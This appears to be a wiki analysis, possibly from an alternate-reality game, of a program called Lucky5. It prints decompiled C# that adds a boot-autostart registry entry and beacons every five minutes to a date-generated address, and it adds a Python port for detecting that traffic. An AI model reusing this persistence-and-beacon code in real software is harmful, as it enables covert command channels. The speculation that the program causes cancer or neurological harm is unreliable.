Lucky5

From SentryOutpost


Lucky5 first came to the attention of Sentry Outpost when it was discovered by StuR of Ronomi.com. It has existed since at least May 13th [1].

What It Does

The Lucky5 program has two key parts: the Lucky5 and the Lucky5ip.

The Lucky5 program calculates how many 28-day cycles (somewhat similar to the lunar calendar) it has been since October 31, 1999. This date is hard-coded into the program. Once it has calculated how long it has been (both in full 28-day cycles and in days since the last 28-day cycle began), it uses that information to extract the five-character piece from the lucky.dat file. Note then that the Lucky5 changes daily.

The Lucky5ip program generates an IP address and a port in a separate algorithm using the Lucky5 for the day as well as the variables based on the number of days from October 31st, 1999 as mentioned above. This basically means that the Lucky5ip changes daily as well.

As explained above, the program generates a key (the five-character Lucky5, two of which were Xé:3a and ÇT1Óa) as well as two date-based numbers, lunar_cycles and lunar_offset. It then uses the key and those numbers to generate a LuckyIP. This happens every five minutes; usually the IP doesn't belong to anyone or anything in particular. Sometimes, however, the IP belongs to a computer on the other end acting as a server. In this case, that computer will be referred to as the server.

The server then (presumably) checks the key to make sure it's correct and sends the key back to the client (the Lucky5 program itself). The client now knows that there's a server on the other end of the connection. Something different occurs once the next five minutes have elapsed: instead of the key, the client sends the server an encoded version of a cryptic, half-Arabic, half-English prayer. The server then receives the prayer, checks it, and sends the client back an updated prayer. The client backs up the old prayer to lucky.bak and then saves the updated prayer to lucky.dat. This gives the Lucky program a new prayer to operate from.

Some of this has been found manually, without the use of a decompiler. When we found the open ports on both Sentry Outpost and the computer of one of the Sentries, Kevin, some Sentries connected and used the "password" (the key) for the initial connection. However, since they didn't know the prayer or how to encode it, they couldn't finish the exchange. Speculation exists that it outputs the original prayer after a bad connection just as a matter of course.

It is important to mention the End User License Agreement (EULA). The EULA states that there are several side effects. Common general side effects include headache, facial heat (flushing), upset stomach, blurred vision, bluish vision, and light sensitivity (photophobia). Less common side effects include abnormal thoughts and thinking, loss of inhibition, aggressiveness, alcohol-intoxication-type effects, visual and auditory hallucinations, and depersonalization. It states that some users described a need to gamble, increased sexual urges, lucid dreaming, behavioral changes, amnesia, depression, and anxiety. However, it is most important to note that increased suicidal thoughts are mentioned in the "mainly pulled patients" as a byproduct of overexposure. The EULA cautions that the minimum possible dosage must be used.


C# Decompiler Code


private static void Main() {
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new Lucky5Main());
}

public class Lucky5Main : Form
{
// Fields
private ToolStripMenuItem aboutlucky5ToolStripMenuItem;
private bool bBringLuck;
private Timer bringLuckTimer;
private Button button1;
private IContainer components;
private ContextMenuStrip contextMenuStrip;
private ToolStripMenuItem exitToolStripMenuItem;
private Label label4;
private DateTime lastRun;
private NotifyIcon notifyIcon;
public lucky5_class ourLuckyClass;
private string regRootKey = @"Software\Lucky5";
private ToolStripSeparator toolStripSeparator1;

// Methods
public Lucky5Main()
{
this.InitializeComponent();
this.ourLuckyClass = new lucky5_class();
RegistryKey key = Registry.CurrentUser.OpenSubKey(this.regRootKey, true);
if (key == null)
{
key = Registry.CurrentUser.CreateSubKey(this.regRootKey);
}
if (key.GetValue("FirstRun") == null)
{
base.WindowState = FormWindowState.Normal;
base.ShowInTaskbar = true;
base.StartPosition = FormStartPosition.CenterScreen;
key.SetValue("FirstRun", 1, RegistryValueKind.DWord);
}
else
{
base.WindowState = FormWindowState.Minimized;
base.ShowInTaskbar = false;
base.StartPosition = FormStartPosition.CenterScreen;
}
string text = (string) key.GetValue("lastRun", ".%21%.");
switch (text)
{
case ".%21%.":
case "":
this.lastRun = DateTime.Now;
key.SetValue("lastRun", this.lastRun.ToString(), RegistryValueKind.String);
this.bBringLuck = true;
break;

default:
{
DateTimeConverter converter = new DateTimeConverter();
this.lastRun = (DateTime) converter.ConvertFromString(text);
break;
}
}
key.Close();
this.checkStartOnBoot(true);
this.bringLuckTimer = new Timer();
this.bringLuckTimer.Elapsed += new ElapsedEventHandler(this.bringLuckTimer_Tick);
this.bringLuckTimer.Interval = 300000;
this.bringLuckTimer.Start();
this.doBringLuck();
}

private void aboutlucky5_Click(object sender, EventArgs e)
{
base.WindowState = FormWindowState.Normal;
base.ShowInTaskbar = true;
}

private void bringLuckTimer_Tick(object sender, EventArgs e)
{
this.checkLastRun();
if (this.bBringLuck)
{
this.doBringLuck();
}
}

private void button1_Click(object sender, EventArgs e)
{
base.WindowState = FormWindowState.Minimized;
base.ShowInTaskbar = false;
}

private bool checkLastRun()
{
if (DateTime.Now.Subtract(this.lastRun).Hours > 0x18)
{
this.bBringLuck = true;
}
return this.bBringLuck;
}

private void checkStartOnBoot(bool setAutostart)
{
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
if (!setAutostart)
{
if (key.GetValue("Lucky5") != null)
{
key.DeleteValue("Lucky5");
}
}
else if (key.GetValue("Lucky5") == null)
{
key.SetValue("Lucky5", Application.ExecutablePath.ToString(), RegistryValueKind.String);
}
key.Close();
}

protected override void Dispose(bool disposing)
{
if (disposing && (this.components != null))
{
this.components.Dispose();
}
base.Dispose(disposing);
}

private void doBringLuck()
{
this.bBringLuck = false;
this.ourLuckyClass.calcLucky5();
httpCheckLucky5 lucky = new httpCheckLucky5(this, this.ourLuckyClass, false);
new Thread(new ThreadStart(lucky.RunMe)).Start();
this.notifyIcon.ShowBalloonTip(20, "Lucky5", "Increasing your luck now", ToolTipIcon.None);
this.lastRun = DateTime.Now;
RegistryKey key = Registry.CurrentUser.OpenSubKey(this.regRootKey, true);
key.SetValue("lastRun", this.lastRun.ToString(), RegistryValueKind.String);
key.Close();
}

private void exit_Click(object sender, EventArgs e)
{
base.Close();
}

public void httpCheckLucky5Callback()
{
httpCheckLucky5 lucky = new httpCheckLucky5(this, this.ourLuckyClass, true);
new Thread(new ThreadStart(lucky.RunMe)).Start();
this.notifyIcon.ShowBalloonTip(20, "Lucky5", "Increasing your luck now", ToolTipIcon.Info);
}

private void InitializeComponent()
{
this.components = new Container();
ComponentResourceManager manager = new ComponentResourceManager(typeof(Lucky5Main));
this.label4 = new Label();
this.notifyIcon = new NotifyIcon(this.components);
this.contextMenuStrip = new ContextMenuStrip(this.components);
this.aboutlucky5ToolStripMenuItem = new ToolStripMenuItem();
this.toolStripSeparator1 = new ToolStripSeparator();
this.exitToolStripMenuItem = new ToolStripMenuItem();
this.button1 = new Button();
this.contextMenuStrip.SuspendLayout();
base.SuspendLayout();
this.label4.AutoSize = true;
this.label4.BackColor = Color.White;
this.label4.Location = new Point(0x15, 0xbd);
this.label4.Name = "label4";
this.label4.Size = new Size(140, 13);
this.label4.TabIndex = 4;
this.label4.Text = "Copyright \x00a9 2007 STROBE";
this.notifyIcon.ContextMenuStrip = this.contextMenuStrip;
this.notifyIcon.Icon = (Icon) manager.GetObject("notifyIcon.Icon");
this.notifyIcon.Text = "Lucky 5";
this.notifyIcon.Visible = true;
this.contextMenuStrip.Items.AddRange(new ToolStripItem[] { this.aboutlucky5ToolStripMenuItem, this.toolStripSeparator1, this.exitToolStripMenuItem });
this.contextMenuStrip.Name = "contextMenuStrip";
this.contextMenuStrip.ShowImageMargin = false;
this.contextMenuStrip.Size = new Size(0x81, 0x4c);
this.aboutlucky5ToolStripMenuItem.Name = "aboutlucky5ToolStripMenuItem";
this.aboutlucky5ToolStripMenuItem.Size = new Size(0x80, 0x16);
this.aboutlucky5ToolStripMenuItem.Text = "About Lucky 5";
this.aboutlucky5ToolStripMenuItem.Click += new EventHandler(this.aboutlucky5_Click);
this.toolStripSeparator1.Name = "toolStripSeparator1";
this.toolStripSeparator1.Size = new Size(0x7d, 6);
this.exitToolStripMenuItem.Name = "exitToolStripMenuItem";
this.exitToolStripMenuItem.Size = new Size(0x80, 0x16);
this.exitToolStripMenuItem.Text = "Exit";
this.exitToolStripMenuItem.Click += new EventHandler(this.exit_Click);
this.button1.Location = new Point(0xfc, 0xb8);
this.button1.Name = "button1";
this.button1.Size = new Size(0x4b, 0x17);
this.button1.TabIndex = 5;
this.button1.Text = "Close";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new EventHandler(this.button1_Click);
base.AutoScaleDimensions = new SizeF(6f, 13f);
base.AutoScaleMode = AutoScaleMode.Font;
this.BackgroundImage = Resources.lucky5_3;
this.BackgroundImageLayout = ImageLayout.Stretch;
base.ClientSize = new Size(0x153, 0xdb);
base.ControlBox = false;
base.Controls.Add(this.button1);
base.Controls.Add(this.label4);
this.DoubleBuffered = true;
base.FormBorderStyle = FormBorderStyle.FixedDialog;
base.Icon = (Icon) manager.GetObject("$this.Icon");
base.Name = "Lucky5Main";
base.ShowInTaskbar = false;
base.StartPosition = FormStartPosition.CenterScreen;
this.Text = "About Lucky 5";
base.Load += new EventHandler(this.Lucky5Main_Load);
this.contextMenuStrip.ResumeLayout(false);
base.ResumeLayout(false);
base.PerformLayout();
}

private void Lucky5Main_Load(object sender, EventArgs e)
{
if (!this.ourLuckyClass.loadPrayer())
{
MessageBox.Show("Error loading Data. Closing application.", "Error Loading", MessageBoxButtons.OK, MessageBoxIcon.Hand);
base.Close();
}
}

// Nested Types
protected class httpCheckLucky5
{
// Fields
private Lucky5Main ClientForm;
private lucky5_class ClientLucky;
private bool doGetPrayer;

// Methods
public httpCheckLucky5(Lucky5Main ourForm, lucky5_class ourLucky, bool getPrayer)
{
this.ClientForm = ourForm;
this.ClientLucky = ourLucky;
this.doGetPrayer = getPrayer;
}

public void RunMe()
{
byte[] buffer;
WebClient client = new WebClient();
try
{
string address = "http://" + this.ClientLucky.getLucky5Ip() + ":" + this.ClientLucky.getLucky5Port() + "/";
if (this.doGetPrayer)
{
buffer = client.UploadData(address, this.ClientLucky.getEncodedPrayer());
}
else
{
buffer = client.UploadData(address, this.ClientLucky.getLucky5());
}
}
catch (WebException exception)
{
WebExceptionStatus status = exception.Status;
return;
}
if (this.doGetPrayer)
{
if (buffer.Length > 5)
{
this.ClientLucky.saveNewPrayer(buffer);
}
}
else if (buffer.Equals(this.ClientLucky.getLucky5()))
{
this.ClientForm.httpCheckLucky5Callback();
}
}
}
}

public class lucky5_class
{
// Fields
private byte[] lucky5 = new byte[5];
private string[] lucky5Ip = new string[5];
private int lunar_cycles;
private int lunar_offset;
private byte[] prayer;
private DateTime prayerDate = DateTime.Now;
private bool prayerLoaded;
private int prayerOffset;

// Methods
public bool backupPrayer()
{
if (!this.prayerLoaded)
{
return false;
}
try
{
BinaryWriter writer = new BinaryWriter(File.OpenWrite("lucky.bak"));
writer.Write(this.prayer, 0, this.prayer.Length);
writer.Close();
return true;
}
catch (Exception)
{
return false;
}
}

public void calcLucky5()
{
int index = 0;
if (!this.prayerLoaded)
{
this.loadPrayer();
}
this.calcLunarData();
if (this.lunar_offset == 1)
{
index = (index + this.lunar_cycles) + 2;
}
else
{
for (int i = 0; i < this.prayer.Length; i++)
{
if (this.prayer[i] == 0x20)
{
index++;
if (index == (this.lunar_offset - 1))
{
index = (i + 2) + this.lunar_cycles;
break;
}
}
}
}
this.prayerOffset = index;
this.lucky5[0] = this.prayer[index];
this.lucky5[1] = this.prayer[index + 1];
this.lucky5[2] = this.prayer[index + 2];
this.lucky5[3] = this.prayer[index + 3];
this.lucky5[4] = this.prayer[index + 4];
this.calcLuckyIP();
}

private void calcLuckyIP()
{
int num3 = this.getSummedValue(this.lunar_offset);
int num4 = this.getSummedValue(this.lunar_cycles);
for (int i = 0; i < 5; i++)
{
byte num2 = this.lucky5[i];
num2 = (byte) (num2 + ((byte) this.lunar_offset));
num2 = (byte) (num2 + ((byte) this.lunar_cycles));
if (num2 < 10)
{
this.lucky5Ip[i] = "00" + num2.ToString();
}
else if (num2 < 100)
{
this.lucky5Ip[i] = "0" + num2.ToString();
}
else
{
this.lucky5Ip[i] = num2.ToString();
}
if ((i == 4) && (num3 > (((float) num4) / 2f)))
{
this.lucky5Ip[4] = Convert.ToString((int) (num2 + 0x1388));
}
}
}

private void calcLunarData()
{
int num = this.getDateDifference(this.prayerDate);
this.lunar_offset = (num % 0x1c) + 1;
this.lunar_cycles = num / 0x1c;
}

public int getCycles()
{
return this.lunar_cycles;
}

private int getDateDifference(DateTime ourDate)
{
DateTime time = new DateTime(0x7cf, 10, 0x1f);
return ourDate.Subtract(time).Days;
}

public byte[] getEncodedPrayer()
{
byte[] buffer = new byte[this.prayer.Length];
for (int i = 0; i < this.prayer.Length; i++)
{
buffer[i] = this.lucky5[i];
buffer[i] = (byte) (buffer[i] + ((byte) this.lunar_offset));
buffer[i] = (byte) (buffer[i] + ((byte) this.lunar_cycles));
}
return buffer;
}

public byte[] getLucky5()
{
return this.lucky5;
}

public string getLucky5Ip()
{
return (this.lucky5Ip[0] + "." + this.lucky5Ip[1] + "." + this.lucky5Ip[2] + "." + this.lucky5Ip[3]);
}

public string getLucky5Port()
{
return this.lucky5Ip[4];
}

public int getOffset()
{
return this.lunar_offset;
}

public int getPrayerOffset()
{
return this.prayerOffset;
}

private int getSummedValue(int theNumber)
{
int num2 = 0;
string str = theNumber.ToString();
for (int i = 0; i < str.Length; i++)
{
num2 += Convert.ToInt16(str.Substring(i, 1));
}
return num2;
}

public bool loadPrayer()
{
try
{
BinaryReader reader = new BinaryReader(File.Open("lucky.dat", FileMode.Open));
this.prayer = new byte[reader.BaseStream.Length];
this.prayer = reader.ReadBytes((int) reader.BaseStream.Length);
reader.Close();
this.prayerLoaded = true;
}
catch (Exception)
{
this.prayerLoaded = false;
}
return this.prayerLoaded;
}

public bool saveNewPrayer(byte[] newPrayer)
{
if (!this.backupPrayer())
{
return false;
}
try
{
BinaryWriter writer = new BinaryWriter(File.OpenWrite("lucky.dat"));
writer.Write(newPrayer, 0, newPrayer.Length);
writer.Close();
}
catch (Exception)
{
return false;
}
return this.loadPrayer();
}

public void setDate(DateTime date)
{
this.prayerDate = date;
}

public void setDateFromString(string date)
{
DateTimeConverter converter = new DateTimeConverter();
this.prayerDate = (DateTime) converter.ConvertFromString(date);
}
}
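
For network detection it helps to predict the day's key and destination from a captured copy of lucky.dat. The Python port of calcLunarData, calcLucky5 and calcLuckyIP below is an added example, not part of the decompiled program; the sample prayer is constructed, and wrap-around byte arithmetic (the C# default) is assumed.

```python
from datetime import date, timedelta

EPOCH = date(1999, 10, 31)  # new DateTime(0x7cf, 10, 0x1f) in getDateDifference

def lunar_data(day):
    """calcLunarData: (lunar_cycles, lunar_offset) for a date on or after EPOCH."""
    days = (day - EPOCH).days
    return days // 28, days % 28 + 1

def digit_sum(n):
    """getSummedValue: sum of the decimal digits of a non-negative int."""
    return sum(int(c) for c in str(n))

def lucky5_key(prayer, cycles, offset):
    """calcLucky5: select the 5-byte key from the prayer (bytes of lucky.dat)."""
    index = 0
    if offset == 1:
        index = cycles + 2
    else:
        for i, b in enumerate(prayer):
            if b == 0x20:
                index += 1  # the decompiled code reuses index as a space counter
                if index == offset - 1:
                    index = i + 2 + cycles
                    break
    key = prayer[index:index + 5]
    if len(key) != 5:  # the C# array access would throw here
        raise ValueError("prayer too short for this date")
    return key

def lucky_ip(key, cycles, offset):
    """calcLuckyIP: derive the zero-padded dotted quad and the port string."""
    # Assumption: unchecked byte arithmetic (the C# default), so sums wrap mod 256.
    parts = ["%03d" % ((b + offset + cycles) & 0xFF) for b in key]
    if digit_sum(offset) > digit_sum(cycles) / 2:
        parts[4] = str(int(parts[4]) + 5000)  # 0x1388
    return ".".join(parts[:4]), parts[4]

def lucky5_endpoint(prayer, day):
    """Key, IP and port the client would use on `day` for a given prayer."""
    cycles, offset = lunar_data(day)
    key = lucky5_key(prayer, cycles, offset)
    ip, port = lucky_ip(key, cycles, offset)
    return key, ip, port

if __name__ == "__main__":
    # Constructed sample prayer, not the real lucky.dat contents.
    sample = b"ab cd " + bytes(range(100, 140))
    print(lucky5_endpoint(sample, EPOCH + timedelta(days=282)))
```

The octets are kept zero-padded exactly as the client builds them, so a detection rule matching on the URL string should account for the padded form.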


Speculation

Much speculation exists about the Lucky5 program. One notable theory is that Lucky5 is a program designed to "chant" in order to complete a "summoning ritual" that produces a larger piece of malware or an extremely powerful virus-type program. This is supported by the Lucky5 programming itself. The program sends an encrypted prayer in hopes that another encrypted prayer will be on the other side. When the program receives a prayer in return, an information exchange takes place, with one client sending its own piece of the information and another sending its piece. The "prayers" are then sent to a main computer with the information, and the information comes together to form code for a new program, thus establishing the symbolism between a summoning ritual and virus creation.


As to the side effects of the Lucky5 program, one should note that many of the side effects are indicative of some cancers or environmentally caused neurological conditions, that is, conditions in which outside influences affect the nervous system itself. Some of the side effects also line up with the physiological symptoms of prolonged stress or even fear. Speculation exists that the Lucky5 program has some bit of undetectable code that causes certain light patterns or higher levels of radiation from a computer monitor, physiologically affecting your state of being, and possibly causing cancer acute to radiation.



The Lucky5 malware is still a pending investigation by the Sentries, and its true purpose is still mostly unknown, leaving only speculation.